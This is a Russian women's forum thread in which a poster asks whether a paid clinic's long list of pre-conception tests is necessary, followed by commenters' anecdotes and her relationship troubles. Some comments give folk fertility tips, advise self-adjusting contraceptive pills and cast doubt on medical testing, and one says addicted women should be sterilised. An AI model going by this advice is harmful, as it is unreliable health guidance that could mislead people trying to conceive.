Вход
Здравствуйте, гость !
Войдите под своим именем
или Зарегистрируйтесь.
меньше минуты назад2016-12-09 13:41:47 от Гость
Всем доброго времени суток!)) Нужен совет по воспитанию сына. Сыну через 1, 5 месяца исполнится 9 лет. В последнее время все чаще замечаю, что не справляюсь с ним. Он очень изменился. Раньше, в более маленьком возрасте был очень добрым, любознательны ... Подробнее
Последний комментарий
История : Благодарные родственники
8 минут назад2016-12-09 20:30:28 от Гость
Елена Ройтер, А я живу по сей день на Украине живу, только это то здесь причём? Если Вы пытаетесь мне объяснить, что здесь жить тяжело, да не сахар, но при желании можно много достичь, а если сидеть "на попе ровно", и ничего не делать, то хоть на Мальдивах сиди, а кушать как не было так и не буд ... Все комментарии67577
Вход
Здравствуйте, гость !
Войдите под своим именем
или Зарегистрируйтесь.
Топ из раздела
Беременность и роды
ШЛЮХА
вчера в 21:42:562016-12-08 21:42:56
Помоги советом
вчера в 21:35:342016-12-08 21:35:34
Комедия
07 декабря в 12:41:15
Любовь это безумия
05 декабря в 06:58:47
Любимый брат мужа
04 декабря в 21:17:22
На работу к папе
03 декабря в 16:30:38
Студент и препод
28 ноября в 23:53:36
Волосенкиии
27 ноября в 22:35:51
Сериалы смотрим?  ( 1 2 )
27 ноября в 16:31:08
Беременность и роды - Неужели всё так сложно?
Беременность и роды : Неужели всё так сложно?     Девочки, Всем доброго дня!!!! Я уже писала на днях сюда в раздел свою историю "Забеременеть не так-то просто". Во-первых, хочу всех вас поблагодарить за добрые отзывы, кто не прошел мимо. После Ваших комментариев и отзывов появилось еще больше надежды и позитивного настроя.Я сегодня была у врача и хочу спросить вашего мнения, совета по поводу некоторой ситуации. Итак, записалась я на прием в платную клинику, так как обычно хожу в гос. поликлинику, и там результаты говорят через день-два, а в платной и талон на удобное время дают, и результаты мазков через 20 минут говорят. Поэтому решила сходить в платную. Но суть не в этом. Итак, явилась на прием. Врач - женщина хорошая, внимательная, ничего не могу сказать против. Но.....когда я сказала про то, что хочу ребенка, была целая петиция про такую кучу необходимых анализов перед планированием беременности, что я честно сказать, загрузилась. Типа, прежде чем вообще зачинать ребенка, нужно стоооооолько всего сделать - анализы на все гормоны, обследование кровотока , и т.д и т.д и т.д.....уже всего не упомнила, но очень много. Куча бумажек- направлений. И предохраняться в это время. Типа чуть ли не два месяца на обследование может уйти. У нас так-то без предохранения не случилось еще беременности, а тут еще ждать месяцы. ЧЕСТНО СКАЗАТЬ, я в тупике! Никогда не думала, что так прям все сложно и серьезно?! Раньше (мои бабушки , тети) беременели и рожали без каких-либо планирующих обследований. Хотя, что я сравниваю...экология, питание другие были. НО! Всё-таки, неужели сейчас прям так необходимо идти на кучу процедур перед зачатием???? Я почему-то так не думаю и против большинства обследований. Во-первых, где гарантия, что это все сделают качественно, и беременность будет 100 % без осложнений , да и потом....если я еще серьезнее к этому относиться буду, так можно вообще чокнуться просто. Я ,конечно, понимаю что врач - специалист, их на это учили, и все такое. Но, может они ,врачи, больше преувеличивают , когда говорят о необходимости кучи анализов перед зачатием и намеренно пугают (что могут быть какие-то угрозы)? Вон у пьяниц некоторых (знаю много примеров)- бутылочка спиртного да сигаретка с пивком, ни о чем не думают- вот и всё обследование. Дети здоровы. А тут прям такое , что вот прям "необходимо". Единственное, с чем я хочу согласиться - это мазки, узи и спермограмма. Остальное - в голове не укладывается, неужели прям надо. Дело не в деньгах даже ( мы работаем, Честно говоря, в финансовом плане можем позволить оплатить эти анализы). Дело в другом. Мне кажется, чем больше ходить по этим врачам , тем еще можно больше зациклиться на этом , и сделать хуже. Девочки, хочу услышать Ваше мнение по этому поводу, кто как думает и проходили ли Вы перед зачатием кучу обследований? Спасибо заранее за советы.После похода к врачу, честно говоря, вообще создалось такое представление о беременности как о "фантастическом", каком-то нереальном событии. Как сказала врач "Дети сейчас дорого обходятся" . Но врачи не Боги, они не имеют права так говорить.
57238
Другие Беременность и роды
(35)
Гость
Гость

25 февраля 2015 13:55:41
2015-02-25 13:55:41
Я тоже так же думаю... и тоже такие же вопросы задаю... Но я прошла все обследования почти год все это проходила и на массажи всякие ходила и на грязи что со мной только не делали и сколько денег я отдала капец просто.. и все бесталку. Но врачи говорят что я здорова что все у меня хорошо.. тогда зачем мне все это назначили? я спрашивала.. а они говорили что бы лучше было. Вот мужа не как не могу заставить сходить сперму грамму сдать.
Ответить
Поддерживаю Да2 / Нет0
Папина дочка
18465 Папина дочка
Папина дочка offline
Репутация : 93078
Комментариев 394 1
25 февраля 2015 14:04:53
2015-02-25 14:04:53
Я очень жалею что не готовилась к беременности. Не занималась спортом, не питалась правильно, курила, не пропила элементарно курсом витамины, работала как проклятая, не был налажен режим сна и бодрствования. Как следствие сейчас я набрала 25 кг, а у меня еще чуть больше половины срока. Боремся с отеками. Из-за стремительной сильной прибавки полетели суставы-голеностопы и колени. Второй раз болею орви. Животик на данный момент уже большой-поддавливает диафрагму+отеки и лишний вес=задыхаюсь при ходьбе (у меня еще сердце не здоровое), спать сидя приходится. Два месяца на обследование-ничто по сравнению с тем, какие трудности переживает организм, когда находится в "интересном"положении. Если сомневаетесь в этом враче, есть другие. Может, этот доктор не учла ваш психологический статус и вывалила сразу все, а не по порядку. Обследуйтесь и подготовьтесь. Это не трудно. И это во благо не только вам, но и малышу. Желаю вам всего хорошего!
Ответить
Поддерживаю Да3 / Нет0
облачко в небе
12590 облачко в небе
Облачко в небе offline
Репутация : 27203
Комментариев 226 0
25 февраля 2015 14:07:19
2015-02-25 14:07:19

Автор как вы сами говорили у вас проблемы с зачатием. Скорее всего анализы и обследования пройти нужно. Правда лучше еще проконсультироваться с другим врачом, потому что платные клиники много лишнего навязывают. К тому же вашему парню тоже необходимо анализы сдать. Подойдите ответственно к этому делу и не делайте кучу никому не нужных анализов. Кстати в интернете много статей , где написаны базовые обследования при планировании беременности.

Ответить
Поддерживаю Да2 / Нет0
Кхалиси
17782 Кхалиси
Кхалиси offline
Репутация : 113738
Комментариев 1045 0
25 февраля 2015 14:13:52
2015-02-25 14:13:52

Скорее всего врач, хочет просто денег. Сходите в другие поликлиники, включая бесплатные. Вам могут навязать лишние анализы.

Вообще, по хорошему, если речь идет о планирование беременности, то там надо сдавать не мало анализов. Это не предохраняет от патологий, но дает возможность вовремя среагировать и решить возникающую проблему. Во время беременности, будет еще сильнее контроль и сдача анализов. Это нормально.

Раньше рожали так, и радовались если из 12 детей 4 доживут до совершеннолетия. Это не говоря про возможные патологии, выкидыше постоянные и как такое отражается на здоровье матери, вплоть до ее смерти.

Если же речь идет о планирование беременности, когда у одного из родителей есть проблемы со здоровьем, то там еще больше ищет анализов и требований. А на зачатие могут уходить годы, в сложных ситуациях люди пытаются забеременеть по 10-20 лет.

Есть конечно очень плодовитые люди. Они беременеют и рожают, не смотря на кучу абортов, выкидышей, замерших беременностей, отвратительного образа жизни. Однако вы глубоко заблуждаетесь, что дети рожденные от алкашей здоровы, вы просто можете не знать нюансов их состояния здоровья. Вряд ли вам кто либо станет рассказывать в деталях о заболеваний возникших у того или иного человека в связи с образом жизни его родителей.

Ответить
Поддерживаю Да2 / Нет0
Пламя и Кровь
медузка
12355 медузка
медузка offline
Репутация : 4333
Комментариев 72 10
25 февраля 2015 14:14:31
2015-02-25 14:14:31

Добрый день!Читала вашу прошлую историю, но не успела прокомментировать ранее. В общем начну с того что мне 29 лет, мужу 31 год. Детей нет. В браке почти 10 лет. Была беременность, но случился выкидыш, когда мне было 20 лет, после этого беременности не было. Хочу сказать Вам, что в платных поликлиниках идет высасывание денег (поэтому столько анализов) на своем примере скажу Вам, сколько денег было потрачено на гормоны, на узи и на все и в платных клиниках и толку? Только деньги интересуют, это их хлеб, чем больше они заработают тем лучше. Мой совет, лучше быть в обычной поликлинике, чем работать на платные клинике, которые супер чего не сделают Вам, тем более если забеременеть, то на учет Вы будете ставать в обычной поликлинике, а не в платной. и если не получиться, то в эко можно попасть и через обычную поликлинику. Я сама очень переживаю по поводу рождения ребенка, но что делать, на все божья воля. Мне кажется, если долго мучиться, обязательно получиться. Вы не одна такая. !

Ответить
Поддерживаю Да3 / Нет0
Vet@
8238 Vet@
Vet@ offline
Репутация : 667230
Комментариев 6891 4
25 февраля 2015 14:16:59
2015-02-25 14:16:59

Мое мнение, что врач прав. Т. к. в наше время необходимо планировать беременность. Из-за чего вы думаете, рождается так много деток с патологиями? Потому что мама и папа вели беспорядочный образ жизни, меняя партнеров, не используя элементарно - презерватив. Отсюда ЗППП, которые надо лечить обоим партнерам, если хотите здоровое потомство.

Ответить
Поддерживаю Да3 / Нет0
Статус должен быть в обществе, а не в социальной сети.
Rinka
Rinka

25 февраля 2015 14:17:23
2015-02-25 14:17:23
увидели золотую жилу. поняли что могут денежки с вас вытянуть, вот и назначили больше чем надо. а врачи чаще всего везде одни и те же , днем в обычной жк, а вечером в платной. Из анализов сдайте на инфекции , если не сдавали.
Ответить
Поддерживаю Да6 / Нет0
Жена ингуша
8745 Жена ингуша
Жена ингуша online
Репутация : 2563859
Комментариев 14444 50
25 февраля 2015 14:31:30
2015-02-25 14:31:30

Даже супер обследование на миллионы денег не даст гарантии нормального протекания беременности и рождения здорового ребёнка. Но это не означает, что надо на себя наплевать.

Я готовилась к беременностям элементарно - пила практически постоянно витамины, плюс здоровое питание, на чём-чём, а на еде в моей семье экономить не принято, и, само собой - никакого курения. Даже если вы, автор, сдадите всю эту кучу анализов, всё равно есть вариант, что беременность (возможно) не наступит. Мне кажется, надо сдать не все подряд анализы, на все гормоны и так далее, а только те, которые могут показать, по каким причинам не наступает беременность.

Сдавать вообще ВСЁ нет никакой нужды. Да, вы правы, спермограмма, УЗИ, элементарно - пролактин, тестостерон, прогестерон - такие хотя бы гормоны можно и сдать. И на инфекции надо сдать, правильно Rinka говорит.

Папина дочка, не думаю, что гестоз у тебя по причине того, что ты не пила витамины и не занималась спортом до беременности.

Ответить
Поддерживаю Да5 / Нет0
- Нажмите любую клавишу. - Эту можно? - Эту нет.
*((Ольга))*
16927 *((Ольга))*
*((Ольга))* offline
Репутация : 727368
Комментариев 6117 0
25 февраля 2015 14:57:39
2015-02-25 14:57:39
Помоему, провериться нужно, но не так глобально прям) ну и обязательно начать вести здоровый образ жизни и пить витаминчики.
Ответить
Поддерживаю Да3 / Нет0
Dპhessika
18353 Dპhessika
Dპhessika offline
Репутация : 50208
Комментариев 753 1
25 февраля 2015 15:02:34
2015-02-25 15:02:34

В платных учреждениях.. часто разводят на деньги. То надо, это надо.. еще раз надо. Провериться на серьезные болячки нужно, и я думаю не более. Потому как стоит только начать глобальное обследование.. то устанешь лечиться. И два месяца не хватит

Ответить
Поддерживаю Да1 / Нет0
Гость
Гость

25 февраля 2015 15:18:58
2015-02-25 15:18:58
Комментарии не читала. Выскажу не только свое мнение о платных клиниках. Во многих подобных учреждениях работает система накручивания, попросту говоря, развод на деньги. Я часто обращалась в частные клиники, поэтому в конце подобрала себе одну, где этого меньше всего. В первые недели беременности я сдавала только один дорогой анализ (в районе 2000 рублей), а также делали мужу флюорографию. Больше ничего не сдавала, только все плановое. Единственное, о чем я жалела во время беременности, это о том, что не переболела краснухой и не привилась от нее предварительно. Но в меня и проблем не было по женской части. Если они есть - дополнительное обследование не помешает. Всё равно, я думаю, что не стоит увлекаться. Во время беременности еще по горло насытитесь этими анализами)
Ответить
Поддерживаю Да0 / Нет0
Гость
Гость

25 февраля 2015 15:20:59
2015-02-25 15:20:59
*у меня
Ответить
Поддерживаю Да0 / Нет0
медузка
12355 медузка
медузка offline
Репутация : 4333
Комментариев 72 10
25 февраля 2015 15:29:43
2015-02-25 15:29:43

Так, а как мне интересно глобально лечиться. Говорить в клинике это мне надо, это не надо, им пофиг, я сама тоже начала врачу говорить в платной клинике (в обычную не могу попасть из-за работы, так как постоянно очереди в обычной поликлинике, предварительная запись за неделю, а я не могу так и на работе говорят либо работай, либо увольняйся и ходи лечись. ) зачем все это лишнее мне назначаете и с заведующим ругалась, что вы разводите на деньги на нашем горе, а в ответ не нравиться идите в другое место, а не учите нас лечить. Просто согласна с автором, так как я тоже через все это прохожу в клинике требуют все анализы проходить (нужные и не нужные) поверьте я тоже не в одной клинике была, в основном так и делают, А смысл самой проходить гормоны там, узи сям, спермограмму в др. месте и что принести анализы в клинику и еще что то скажут, что капец так жить нельзя не то что рожать. Я уже от без исходности куча литературы перечитала и теперь понимаю, что с кистой рожать можно, с плохими гормонами тоже можно рожать, единственно если спаек нет и трубы проходимы. Автор я думаю может у Вас с овуляцией проблемы, может вам пройти узи на овуляцию и исходя из этого можно дальше двигаться?

Ответить
Поддерживаю Да1 / Нет0
Папина дочка
18465 Папина дочка
Папина дочка offline
Репутация : 93078
Комментариев 394 1
25 февраля 2015 15:34:14
2015-02-25 15:34:14
Жена ингуша, я все-равно думаю сейчас, что лучше перебдеть, чем недобдеть. Особенно, если позволяют средства. Профилактика дешевле лечения. Да и лечиться лучше до беременности, а не во время. Например, кроме прочего, привести зубы в порядок. Гестоз мне пока никто не ставил, даже больничный не дают. Говорят, что отеки не повод не работать. Я сейчас на больничном по орви. Вот его то и можно было бы избежать или хотя бы облегчить течение, принимай я витамины. Я бы и закалялась с удовольствием. Да много чего, если бы знала, что забеременнею. К следующим беременностям обязательно буду готовиться. Я смотрю, автор уже не впервые оглядывается на пьяниц. Что у них так, а у других-эдак. Шоколадочка, у каждого свои 100%. Если пьяницам Господь дает здоровых детей, то это-для детей благо, а не для их родителей. То есть, что то хорошее должно же быть в жизни этих детей. Вы можете и не соглашаться на все анализы. Но в случае чего, предъявят вам, что вам говорили, а вы не сделали. Не доверяете этому доктору, идите к другому. Я бы вообще с консультации начала.
Ответить
Поддерживаю Да0 / Нет0
Гость
Гость

25 февраля 2015 17:28:00
2015-02-25 17:28:00
Я не советую вам оставлять свои деньги в платной клинике, если конечно вы в них не купаетесь. Мы с мужем прожили вместе уже 16 лет, сколько клиник по началу прошли , сколько денег там оставили, все врачи в один голос твердили у вас все хорошо, почему нет зачатия руки разводили, залечили, последние 3-4 года мы просто руки опустили и перестали уже надеяться, организм видно очистился от этих лекарств, иногда после занятий любовью просто засыпала и получалось что в ванну попадала через несколько часов, и в итоге забеременела и узнала об этом когда срок был уже 16 недель. Мой совет берегите свое здоровье, врачи могут залечить так, что потом и детей не будет уже никогда, поездка на море-это лучше лекарство, многие после этого залетают, может вам тоже поможет. УДАЧИ.
Ответить
Поддерживаю Да1 / Нет0
Violetta
14552 Violetta
Violetta offline
Репутация : 1249833
Комментариев 8867 0
25 февраля 2015 18:03:59
2015-02-25 18:03:59

Сделайте элементарные анализы, согласна с Жена ингуша, тем более, у вас есть проблема с зачатием.

А предохраняться врач гворит для того, чтобы не получилась внематочная (так они мне обяснили), пока не выявлена причина.

Мой совет - проштудируйте интернет, выберите клинику и врача, на которых больше положительных отзывов. Извините, кого обижу, но в бесплатную медицину я не верю, на себе испытала.

Ответить
Поддерживаю Да1 / Нет0
Хорошее настроение - это когда не очень умные люди не бесят, а веселят.
Еваника
18243 Еваника
Еваника offline
Репутация : 168914
Комментариев 1685 4
25 февраля 2015 18:55:58
2015-02-25 18:55:58

Я считаю, что например на гормоны, инфекции, мазок на флору, УЗИ, общий анализ крови, кардиограмму не грех и сдать. Ничего в этом сложного нет, но часто ли Вы это делаете? По-моему перед таким важным делом как беременность удостовериться, что все в организме хорошо не лишнее. Еще можно и даже нужно сходить к стоматологу проверить зубы... А то у многих проблемы начинаются если есть недолеченные.

Ответить
Поддерживаю Да3 / Нет0
А в голове: "на лабутенах я..."
Гость
Гость

25 февраля 2015 19:43:24
2015-02-25 19:43:24
Очень часто беременность наступает в связи с отменой противозачаточных таблеток. В первый раз я так и забеременела, но мы ещё с мужем в отпуск на море ездили, я себе цикл ОК регулировала. Сейчас я беременна ещё раз. Могу сказать, что секс с мужем у меня был редкий ( это был июнь, я как проклятая работала и сил ни на что не оставалось). Секс был всего 2 раза за месяц, ну и совпало с плановым отключением горячей воды. То есть я уснула, а потом проснулась, пока воды нагрела чтобы помыться... Могу сказать шанс забеременеть во второй раз был очень маленький, т. к я после первых родов сильно похудела, у меня были все признаки анорексии. Гинеколог сказала, что это чудо, то, что я забеременела. Мой вес при постановке на учёт 41, 5кг, рост 160 см. Можно представить что я скелет с кожей и костями. Сейчас у меня срок 36 недель. Рожать в конце марта, я вешу 52 кг. Когда рожала первого весила 64 кг. В связи с дефицитом массы тела у меня куча сопутствующих диагнозов, типа задержки развития ребёнка, неправильного его положения. Хотя и питаюсь хорошо, и витамины пью. Анализы все в норме, даже гемоглобин 130, когда норма 120-140. Так что реже сексом занимайтесь, чаще отдыхайте, ну и пару месяцев попробуйте скорректировать цикл ОК (противозачаточные). Кстати одна моя знакомая после секса делала "березку". Ноги вверх поднимала и минут 5 -10 в таком положении была. Ещё можно выбрать позу, например "догги", проще говоря мужчина сзади. Типа анатомически самая " правильная". У животных же прокатывает :)
Ответить
Поддерживаю Да0 / Нет1
Гость
Гость

26 февраля 2015 08:57:27
2015-02-26 08:57:27
Платные клиники это выманивание денег. У моего ребенка пятна на лице не проходили месяц прошла бесплатных врачей и много платных но никто не знал что с ним. Потом пошла в еще одну платную там сказали похоже на герпес или глисты либо кишечная инфекция. У меня истерика. назначили кучу анализов дорогостоющих притом что ребенку 7 месяцев. Муж говорит давай поедим в другой город в столицу. Поехали. Пошли в бесплатную прошли несколько врачей, все как один сказали герпес. сдали анализы - герпес. Сдали практически бесплатно. А в платной назначенные нам анализы стоили 14 тысяч. А это для нашего города хорошие деньги. Их работа выманивать деньги. В платную хожу только на узи.
Ответить
Поддерживаю Да1 / Нет0
Tanuta
18729 Tanuta
Tanuta offline
Репутация : 2790
Комментариев 56 3
27 февраля 2015 09:01:00
2015-02-27 09:01:00

Первая беременность пришла нежданнио-негадано, ничего не пила, кроме фолиевой кислоты. Всё, что было недолечено, лечила уже во втором триместре. Но всё хорошо закончилось. Теперь думаем о втором ребенке. Единственное, что планирую: сделать флюшку, пропить витамины, и поход к гинекологу для сдачи мазка, узи для проверки труб и созревания яицеклетки. Всё это могут сделать в поликлинике по месту жительства бесплатно (при наличии полиса ОМС). Меня в частной клинике врач так уговаривала прижечь эрозию шейки, прям это был вопрос жизни и смерти.... Цена около 2-3 тыс. руб. Я в шоке... Пришла в поликлинику, сдала анализы, сделали кольпоскопию, сказали, что эрозия не увеличивается, опасности нет, и прижигать пока не надо, так как за вторым собираюсь. Я только потом сообразила, что я бы могла потратить 2-3 тыс. на гарантированные осложнения во время родов. Кстати, в частной клинике мне никто ничего не объяснил, только ужас нагнали.

Ответить
Поддерживаю Да1 / Нет0
шоколадочка
18143 шоколадочка
шоколадочка offline
Репутация : 124412
Комментариев 1119 17
27 февраля 2015 10:35:46
2015-02-27 10:35:46
Tanuta, Подскажите, пожалуйста, узи для проверки труб - это как обыкновенное узи органов малого таза или нет? Чем отличается и как проводится?
Ответить
Поддерживаю Да0 / Нет0
шоколадочка
18143 шоколадочка
шоколадочка offline
Репутация : 124412
Комментариев 1119 17
27 февраля 2015 10:38:39
2015-02-27 10:38:39
Tanuta, вот и мне ужас нагнали там. Что типа если что-то не пройдете, потом может придется прервать беременность и про угрозы всякие. Я еще не забеременела , а они уже про прерывание смеют говорить. я вся в шоке оттуда вышла, .
Ответить
Поддерживаю Да0 / Нет0
шоколадочка
18143 шоколадочка
шоколадочка offline
Репутация : 124412
Комментариев 1119 17
27 февраля 2015 10:40:35
2015-02-27 10:40:35
СПАСИБО ВСЕМ ЗА СОВЕТЫ!!!!!!!!!!!!! Поссорились с парнем недавно, вообще уже и не думаю об этом(((((((((((((((((((((((((( (((((((((((((((((((((((((((((( ((((((((( СПАСИБО ВСЕМ ВАМ!!!! ВСЕМ ВАМ СЧАСТЬЯ! Видимо, я пока не заслужила к 30 годам ни семьи, ни детей в данный момент.
Ответить
Поддерживаю Да0 / Нет0
Читательница
14629 Читательница
Читательница offline
  • Мисс Эрудиция
Репутация : 1102402
Комментариев 16177 6
27 февраля 2015 15:11:01
2015-02-27 15:11:01

шоколадочка , в смысле на совсем поссорились? Что не поделили, если не секрет?

Ответить
Поддерживаю Да0 / Нет0
ТыОставьТоМгновениеНаПамятьИНе ДумайУжеОПлохомВсёЧтоПлохоВедь МожноПоправитьИПройдетНепогодаСДождем
шоколадочка
18143 шоколадочка
шоколадочка offline
Репутация : 124412
Комментариев 1119 17
27 февраля 2015 15:35:47
2015-02-27 15:35:47
Читательница , я недавно у него на сайте снова увидела фотки голых п..... женщин, (очень не приятно об этом говорить). Уже была такая ситуация. Вот что за дебильный интерес : загружать эти фотки с инета и расссматривать их. Фу, противно. Я ему конкретно задала вопрос: У тебя какие-то комплексы или тебе что-то не хватает?????? И начинает... да что ты, да ты мне только интересна , да все мне хватает, да это просто картинки, да ля-ля-ля. Больше всего бесит , что сначала пытается извернуться, обмануть , а потом уже слова любви и т. д. и т. п. НУ НЕ ПОНИМАЮ Я ЭТОГО!!!!! НУ ЧТО ИМ НЕ ХВАТАЕТ!!! НУ ПОЧЕМУ ТЯНЕТ НА ЭТИ ЧУЖИЕ ГОЛЫЕ П....... , пусть и по интернету, но всё же. ОБИДНО!!!! ДО СЛЕЗ!Я Хожу по врачам, а он.. выдал мне недавно "Я согласен спермограмму сдать" Хочется, чтобы мужчина понимал важность этого и хотел, сказал бы " Я хочу, мне это надо и т. д" А то... "Я согласен". Еще и эти фотки с инета. Я понимаю, когда интересы у мужчин серьезные: например, увлечение марками машин, как построить дом, какие бывают стройматериалы - ну это я к примеру, ну не этот интерес к голым п.... женщин. Ему 33 года! Пристыдила его, поругались сильно, мерзкое ощущение, секса не хочу с ним - я человек эмоций! в данный момент паршивое к нему чувство. И понимаю, что мне уже 30 исполнится , и не факт, что другие парни лучше. Как мне мама сказала :" Доча, ну есть же у него и нормальные хорошие черты, за них и держись, а так по сути все кобели. Занимайся любимыми делами, отвлекись, не обращай внимания, больше себе внимания уделяй, а не ему. Радуйся вообще жизни. Где сейчас лучше найдешь"- смысл таков. Вон сколько историй на сайте - ужас, один другого "краше" . На душе депрессуха, не знаю. Сейчас ходит виноватый весь такой, типа ну это же "просто картинки" . А вообще, главная причина ссоры - это то, что прошло три года, а у нас так и не узаконены отношения, по сути им так удобно сейчас, сожительствовать без штампа . С другой стороны, что поменяет штамп.... Запуталась. В данный момент очень злая на него. Есть мужчины , (единицы, наверное) которые хотят брака , семьи, узаконенных отношений. А есть те, кого и так устраивают отношения. Всегда хвалю его за хорошие черты, но когда обижает - в меня как зверь вселяется. Хотя по натуре очень нежная, добрая, - сам говорит . И что им мужикам не хватает...
Ответить
Поддерживаю Да0 / Нет0
шоколадочка
18143 шоколадочка
шоколадочка offline
Репутация : 124412
Комментариев 1119 17
27 февраля 2015 15:43:13
2015-02-27 15:43:13
Больше всего мне это надо, а ему ... "ну ладно, я согласен".
Ответить
Поддерживаю Да0 / Нет0
Читательница
14629 Читательница
Читательница offline
  • Мисс Эрудиция
Репутация : 1102402
Комментариев 16177 6
27 февраля 2015 15:56:30
2015-02-27 15:56:30

шоколадочка , получается, что дело не в картинках, все гораздо глубже, а картинки стали лишь последней каплей терпения. На самом деле все дело в том, что он не хочет брака с вами и что ему не важно то, что важно для вас, для него важны какие-то картиночки интимных мест других девушек, что он вас не понимает просто, вот и все.

А как вы собирались заводить ребенка? В сожительстве? А он вообще хочет ребенка? Такое ощущение, что он на отвали все делает, т. е. чтоб вы только от него отстали просто... Без обид.{#}

Ответить
Поддерживаю Да3 / Нет0
ТыОставьТоМгновениеНаПамятьИНе ДумайУжеОПлохомВсёЧтоПлохоВедь МожноПоправитьИПройдетНепогодаСДождем
шоколадочка
18143 шоколадочка
шоколадочка offline
Репутация : 124412
Комментариев 1119 17
27 февраля 2015 16:04:18
2015-02-27 16:04:18
Читательница , Вы совершенно правы! Эти картинки стали каплей просто, пощечин ему таких надавала, и моральных, ну не смогла себя сдержать. Про детей впервые я заговорила, он поддержал, типа "хочу", "будем стараться" и т. д. Витамины, фрукты старается мне покупать, заставляет чтобы ела . Но про семью так же говорит только тогда, когда я об этом говорю. Сам в многодетной семье воспитывался, может нанянчился в детстве, что о семье говорит только в крайних моментах. Мне так хочется , чтобы от мужчины инициатива исходила тоже. А эти картинки - это просто добило. Бесит этот интерес к чужим п..... Лучше бы серьезными вещами занялся, а не этим любопытством как малолетний озабоченный на эти фотки, честное слово. Когда уже морально подрастет. обидно, и век у нас женский не вечный , не триста лет. Было бы мне лет 20 сейчас, может я бы так не переживала. С другой стороны, я сама виновата, сама ведь позволила просто отношения не узаконенные.
Ответить
Поддерживаю Да1 / Нет0
Гость
Гость

27 февраля 2015 16:37:37
2015-02-27 16:37:37
шоколадочка , понимаете, для мужика это ой как непросто - сдавать анализы спермы. Это ставит под сомнение его способность к продолжению рода. На самом низком уровне для мужчин это - основное качество, способность оплодотворить самку. А вдруг выяснится, что он недееспособен, пустоцвет, так сказать? Какой удар по мужскому самолюбию! Отнеситесь к этому снисходительнее, мужчины ведь такие мужчины.
Ответить
Поддерживаю Да0 / Нет0
шоколадочка
18143 шоколадочка
шоколадочка offline
Репутация : 124412
Комментариев 1119 17
27 февраля 2015 16:42:15
2015-02-27 16:42:15
Aes Sedai, хорошо, постараюсь. но мы и так, девчонки, часто к парням относимся снисходительно, пытаясь понять их во многом, а они иногда не хотят понимать нас (( Спасибо, я всё же постараюсь понять.
Ответить
Поддерживаю Да1 / Нет0
Читательница
14629 Читательница
Читательница offline
  • Мисс Эрудиция
Репутация : 1102402
Комментариев 16177 6
27 февраля 2015 17:31:19
2015-02-27 17:31:19

шоколадочка , что значит вы позволили? Он разве делал вам предложение, от которого вы отказались? Пожить до оф. брака вместе даже нужно, чтоб потом всякие демоны сюрпризом не вылезли, а дальше инициатива должна быть от него, не вы же ему должны предложение сделать...

А мужики порой морально никогда не подрастают. Некоторые из них и в 40-50 как в 15-20.

Вы уж не обижайтесь, но я все же скажу свое мнение. Это так просто... информация к размышлению. Я, конечно, понимаю, что вы очень хотите ребенка, прилагаете к этому всяческие усилия, только если он сейчас вас не понимает и не оказывает существенной поддержки, то потом может оказаться и так, что когда будет ребенок, то вы от него не понимания, не поддержки не дождетесь. Мне жалко ваши нервы. Просто ему все это ни так нужно, как вам... Все его "хочу" по сути лишь на уровне слов, он не понимает похоже еще и многого, у него все какие-то бирюльки, да и игрушки, не смотря на уже приличный возраст. Уж простите.{#}У меня есть один знакомый, он младше намного вашего парня, так вот он давно уже хочет детей. Только все его "хочу" сводится к тому, чтоб поиграть с ребенком, как с игрушкой, человек совершенно не понимает всей ответственности, не понимает элементарных вещей, да и ведь женщинам поддержка очень важна, важна уверенность, что вы единая команда, что он поддержка и опора, уверенность, что у вас есть завтра...

Ответить
Поддерживаю Да1 / Нет0
ТыОставьТоМгновениеНаПамятьИНе ДумайУжеОПлохомВсёЧтоПлохоВедь МожноПоправитьИПройдетНепогодаСДождем
шоколадочка
18143 шоколадочка
шоколадочка offline
Репутация : 124412
Комментариев 1119 17
27 февраля 2015 17:58:58
2015-02-27 17:58:58
Читательница , Как бы мне хотелось по другому представлять, НО Я СОГЛАСНА С ВАМИ! Я тоже абсолютно так же считаю!!!!!!!!!!!!! Увы, это так.. ! Большинство из них дети, и дело не в возрасте. Согласна. Есть и в 50 не повзрослевшие. Спасибо за понимание, обидно до соплей. Завтра на работу, слава Богу! Отвлекусь с людьми. А про предложение - будете смеяться: в июне после моих разговоров "сделал" предложение и , похоже, забыл тут же об этом)))) Наступило затишье, и на мои разговоры (раз в 3-4 месяца) он говорит про семью) всего лишь слова..... в общем легче плыть по течению, чем регистрировать отношения. Психолог мне посоветовала "не париться" на этот счет, что есть многие со штампом и несчастные, а есть без штампа более счастливые. да уж....
Ответить
Поддерживаю Да1 / Нет0
Читательница
14629 Читательница
Читательница offline
  • Мисс Эрудиция
Репутация : 1102402
Комментариев 16177 6
27 февраля 2015 18:08:22
2015-02-27 18:08:22

шоколадочка , я согласна в принципе, что можно быть несчастным и со штампом, а счастливым без него, только извините за мое мнение, но у вас счастья я не увидела...{#} Счастье то ведь - это когда все друг для друга, ни то, что поддержку, а последнее отдашь, а куча проблем пройденных вместе лишь сплочают, а не выявляют каким человек на самом деле оказался. При любых обстоятельствах семья должна оставаться семьей, а не когда каждый сам за себя, вот тогда это счастье.

Ответить
Поддерживаю Да0 / Нет0
ТыОставьТоМгновениеНаПамятьИНе ДумайУжеОПлохомВсёЧтоПлохоВедь МожноПоправитьИПройдетНепогодаСДождем
леночкин
9977 леночкин
Леночкин offline
Репутация : 75183
Комментариев 1498 5
30 мая 16:36:17
2016-05-30 16:36:17

{#} охххх набрала так много и все закрыла

Повторюсь тогда) По поводу , что у кого-то то дети просто получаются, хотя и не стараются, а кто-то старается , а не получается, тут можно сказать только - не смотрите, не обсуждай и не осуждайте других. А может у них совсем другие ценности в жизни (вовсе не дети, от чего они не становиться людьми второго сорта) которых также они достичь не могут. И также задаются этим вопрсом, почему у того есть , а у меня нет. Насчет наркоманок и алкашех... вообще всем этим бабищам бы трубы перевязать, женщинами их назвать язык не поворачивается.

Насч ет подготовки к беременности, я как человек недавно тщательно этот вопрос изучивший, самое главное - иммунитет к краснухе чтобы был ( а есть он у многих, в детстве либо болели, либо прививку делали) и залечить острые болезни (порстуда, воспаление, обострение язвы.... ) , хронь лечить смысла нет. НО у Вас есть проблемы и с женски здоровьем и зачать не получается (хотя НЕ ПОЛУЧАЕТСЯ считается от года) А вообще чаще всего работает совет - меньше думайте, парьтесь об этом, меньше накручивайте себя , отпустите ситуацию и все придет само. Банально, но работает))

